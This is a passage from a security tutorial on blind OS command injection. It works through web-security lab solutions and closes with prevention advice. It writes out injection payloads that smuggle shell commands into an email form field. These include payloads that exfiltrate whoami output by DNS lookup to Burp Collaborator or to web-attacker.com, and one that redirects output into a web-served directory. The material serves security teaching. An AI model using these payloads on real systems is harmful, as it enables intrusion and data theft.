OS command injection vulnerabilities (Part 3)

II. Analysis and exploitation of OS command injection vulnerabilities (continued)

6. Check for Blind OS command injection vulnerability by out-of-band technique (OAST)

With the above method of using time delay, there may be errors and ambiguities because it can be affected by many factors such as line speed, asynchronous system response status. We need to look for a more “sure” method.

The idea would be to create an “interaction” from the target to another “place”, which this “interaction” is indicative of. To do this, we can inject a shell command into the target, perform DNS Lookup to another domain that we have permission to see information about incoming requests. The Burp Collaborator feature (in the Burp Suite Professional version) completely meets this need because it contains public IP and private domain, contains DNS service that resolves domain names and searches for ip respectively. Every time an interactive event arrives, Burp Collaborator calls the DNS service, which is why there is always a DNS packet coming before HTTP and HTTPS packets.

Normally when attacking a target, there is only a back and forth exchange between us and the target, without the involvement of a third object/device, which can be understood as a completely “closed” process. When a third party is involved to support the exploit, it is called an out-of-band attack (OAST). When injecting payload to the target, which does the job of sending a query to the Burp Collaborator url, if the payload executes successfully, the system will create an interaction to the Burp Collaborator, we can check the interaction event this. In short, DNS lookup through Burp Collaborator can help us accurately identify the existence of blind holes hidden in the website. Commonly used commands in these cases include dig , nslookup , …

Lab analysis Blind OS command injection with out-of-band interaction

Description: The website contains a blind Command injection vulnerability in user feedback functionality. Knowing that the system executes the shell command at the server with the user input parameters, however the output is not displayed. To solve the lab, we need to perform DNS lookup with Burp Collaborator to check for blind OS Command injection vulnerability.

Check the DNS lookup in the Submit feedback function using the dig command, the email parameter results in a successful response:

Payload: email=hacker%40gmail.com;dig+2uxow197tguhtquv3keggqawpnvpje.burpcollaborator.net

In addition, you can use some other commands, such as nslookup :

Payload: email=hacker%40gmail.com||nslookup+9gqvi8vefngofxg2pr0n2xw3buhy5n.burpcollaborator.net||

7. Exploiting Blind OS command injection vulnerability with out-of-band (OAST) technique

Are you wondering, the out-of-band technique (OAST) only works to check for the existence of this type of vulnerability? Because of the “blind” nature of the vulnerability, then how to exploit sensitive information and data? Don’t worry, out-of-band technology can completely help us extract information as well as sensitive data from the target. Indeed, consider the following payload:

& nslookup whoami.kgji2ohoyw.web-attacker.com &

The command executes a DNS lookup query to kgji2ohoyw.web-attacker.com and contains the following whoami command results:

wwwuser.kgji2ohoyw.web-attacker.com

Lab analysis Blind OS command injection with out-of-band data exfiltration

Description: The website contains a blind Command injection vulnerability in user feedback functionality. Knowing that the system executes the shell command at the server with the user input parameters, however the output is not displayed. To solve the lab, we need to execute the whoami command and extract the displayed results via DNS query to Burp Collaborator.

Check the DNS lookup in the Submit feedback function using the dig command, the email parameter results in a successful response:

Payload: email=hacker%40gmail.com||dig+c6jy8blh5q6r5065fuqqs0m61x72vr.burpcollaborator.net||

Extract the whoami command results via DNS query to Burp Collaborator:

• Payload 1: email=hacker%40gmail.com||host+whoami.c6jy8blh5q6r5065fuqqs0m61x72vr.burpcollaborator.net||

• Payload 2: email=hacker%40gmail.com||nslookup+whoami.br6xta6gqprqqzr40tbpdz75mwsnib7.burpcollaborator.net||

8. Exploit Blind OS command injection vulnerability by writing output data in other directories

We can “forward” the output from the inject payload to a file in the root directory we have write permissions, and then retrieve it with the browser to read the output. For example, the system’s static resources (images) are stored in the /var/www/static/images directory, since we have access to these resources, if installed by the system. To allow the user to write data in this directory, we can execute the payload as follows:

& whoami > /var/www/static/images/whoami.txt &

The above shell command writes the whoami command results to the whoami.txt file at /var/www/static/images directory. We can then access the URL https://vulnerable-website.com/images/whoami.txt to read the output.

Lab analysis Blind OS command injection with output redirection

Description: The website contains a blind Command injection vulnerability in user feedback functionality. Knowing that the system executes the shell command at the server with the user input parameters, however the output is not displayed. In addition, we can write data in the /var/www/images/ directory. To solve the lab, we need to exploit the whoami command execution vulnerability to get the current username in the server.

Similar to the above lab, check the DNS lookup in the Submit feedback function, the email parameter executes successfully:

We have write permissions in the /var/www/images/ directory, try creating a file hacker.txt with the touch command:

More content for hacker.txt :

Access the file hacker.txt to check if the content is displayed:

We see that the content is displayed successfully, so we can use the whoami command to write the current username in the hacker.txt file:

Lab completed!

Besides, instead of using the way to write and read data in the /var/www/images directory, we can map the data to the domain host Burp Collaborator.

Payload: email=hacker%40gmail.com||host+whoami.z11l3yg40d1e0n1sahldnnhtwk2lqa.burpcollaborator.net||

III. Measures to prevent OS command injection vulnerabilities

The best way to prevent this vulnerability is probably to completely eliminate the use of shell commands during product operation. They should be replaced with APIs that have been proven to be safe and secure. Sometimes, when a system cannot avoid using user input passed into shell commands, some of the following prevention measures can be taken:

• There is a process that strictly checks user input such as suppressing all unnecessary special characters, requiring input to follow a specific regular expression.
• Use a combination of blacklist, whitelist of keywords.

References

• https://portswigger.net/web-security/os-command-injection
• https://ethicalhacs.com/dvwa-command-injection/
• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
• https://portswigger.net/burp/documentation/collaborator
• https://www.php.net/manual/en/index.php